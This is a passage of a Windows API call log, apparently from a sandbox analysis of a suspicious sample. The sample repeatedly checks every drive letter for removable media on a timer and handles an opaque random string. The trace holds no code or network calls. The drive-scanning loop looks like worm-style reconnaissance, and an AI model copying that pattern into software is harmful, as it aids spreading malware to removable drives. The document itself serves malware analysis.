RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd370 [0215.817] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0215.818] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0215.818] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0215.818] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0215.818] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0215.818] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0215.818] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0215.818] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0215.818] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0215.818] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0215.818] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0215.818] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0215.818] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0215.819] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0215.819] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0215.819] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0215.819] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0215.819] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0215.820] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0215.820] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0215.820] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0215.820] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0215.821] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0215.821] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0215.821] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0215.821] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0215.822] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0215.822] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0215.822] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0215.822] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0215.822] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0215.823] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0215.823] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0215.823] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0215.823] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0215.823] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0215.823] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0215.823] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0215.823] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd370 | out: hHeap=0x12c0000) returned 1 [0215.824] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0215.824] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0215.824] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fec40 [0215.824] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0215.824] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8a0 [0215.824] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0215.824] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0215.824] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0215.824] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 1 [0215.824] TranslateMessage (lpMsg=0x7dfb8c) returned 0 [0215.825] DispatchMessageW (lpMsg=0x7dfb8c) returned 0x0 [0215.825] KillTimer (hWnd=0x802d6, uIDEvent=0x1) returned 1 [0215.825] SetTimer (hWnd=0x802d6, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0215.825] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.825] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0215.825] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0215.825] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0215.825] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1326100 [0215.825] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0215.826] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0215.826] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0215.826] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0215.826] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1326100 | out: hHeap=0x12c0000) returned 1 [0215.826] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0215.826] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0215.826] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132dfc0 [0215.826] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.826] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132dfc0 | out: hHeap=0x12c0000) returned 1 [0215.826] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.826] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0215.826] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0215.826] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0215.826] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0215.826] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0215.826] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0215.826] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0215.826] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fec40 | out: hHeap=0x12c0000) returned 1 [0215.826] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0215.826] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0215.827] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0215.827] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0215.827] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0215.827] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0215.827] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0215.827] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0215.827] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0215.827] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0215.827] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd100 [0215.827] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318c78 [0215.827] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.827] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0215.827] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0215.827] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0215.827] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0215.827] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0215.827] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0215.827] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0215.827] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0215.827] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef820 [0215.827] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef860 [0215.827] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0215.827] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0215.827] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0215.828] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0215.828] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0215.828] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0215.828] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0215.828] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0215.829] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0215.829] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0215.829] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0215.829] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0215.829] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0215.829] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0215.830] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0215.830] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0215.830] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0215.830] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0215.830] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0215.831] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0215.831] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0215.831] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0215.831] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0215.831] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0215.831] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0215.832] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0215.832] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0215.832] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0215.832] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0215.832] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef860 | out: hHeap=0x12c0000) returned 1 [0215.832] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0215.832] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0215.832] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0215.832] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0215.832] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0215.832] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0215.832] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7a0 [0215.832] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0215.832] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0215.832] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0215.833] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.833] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7b0 [0215.833] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0215.833] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7d0 [0215.833] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1326100 [0215.833] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0215.833] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0215.833] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0215.833] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0215.833] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1326100 | out: hHeap=0x12c0000) returned 1 [0215.833] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0215.833] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7b0 | out: hHeap=0x12c0000) returned 1 [0215.833] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132dfc0 [0215.833] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.833] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132dfc0 | out: hHeap=0x12c0000) returned 1 [0215.833] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.833] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318c78 | out: hHeap=0x12c0000) returned 1 [0215.833] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0215.833] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0215.834] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0215.834] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0215.834] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0215.834] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0215.834] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0215.834] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0215.834] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0215.834] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef820 [0215.834] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0215.834] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0215.834] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef830 [0215.834] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318c78 [0215.834] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0215.834] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318c78 | out: hHeap=0x12c0000) returned 1 [0215.834] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef830 | out: hHeap=0x12c0000) returned 1 [0215.834] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd100 [0215.834] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318d50 [0215.834] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.834] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0215.834] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0215.834] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0215.834] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0215.834] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0215.834] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0215.835] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0215.835] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0215.835] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef880 [0215.835] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7b0 [0215.835] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0215.835] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0215.835] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0215.835] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0215.836] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0215.836] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0215.836] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0215.836] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0215.836] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0215.836] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0215.837] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0215.837] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0215.837] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0215.837] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0215.837] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0215.837] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0215.838] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0215.838] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0215.838] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0215.838] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0215.838] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0215.838] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0215.839] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0215.839] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0215.839] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0215.839] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0215.839] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0215.840] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0215.840] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0215.840] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7b0 | out: hHeap=0x12c0000) returned 1 [0215.840] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0215.840] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0215.840] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0215.840] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0215.840] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0215.840] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0215.840] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0215.840] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0215.840] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0215.840] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0215.840] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.840] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0215.840] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0215.840] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0215.840] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325e80 [0215.840] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0215.840] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0215.841] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0215.841] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0215.841] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325e80 | out: hHeap=0x12c0000) returned 1 [0215.841] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0215.841] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0215.841] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e300 [0215.841] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.841] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e300 | out: hHeap=0x12c0000) returned 1 [0215.841] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.841] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318d50 | out: hHeap=0x12c0000) returned 1 [0215.841] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0215.841] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef880 | out: hHeap=0x12c0000) returned 1 [0215.841] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0215.841] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0215.841] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0215.841] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0215.841] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0215.841] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0215.841] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0215.841] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0215.841] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0215.841] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0215.841] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef810 [0215.841] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0215.842] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0215.842] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) 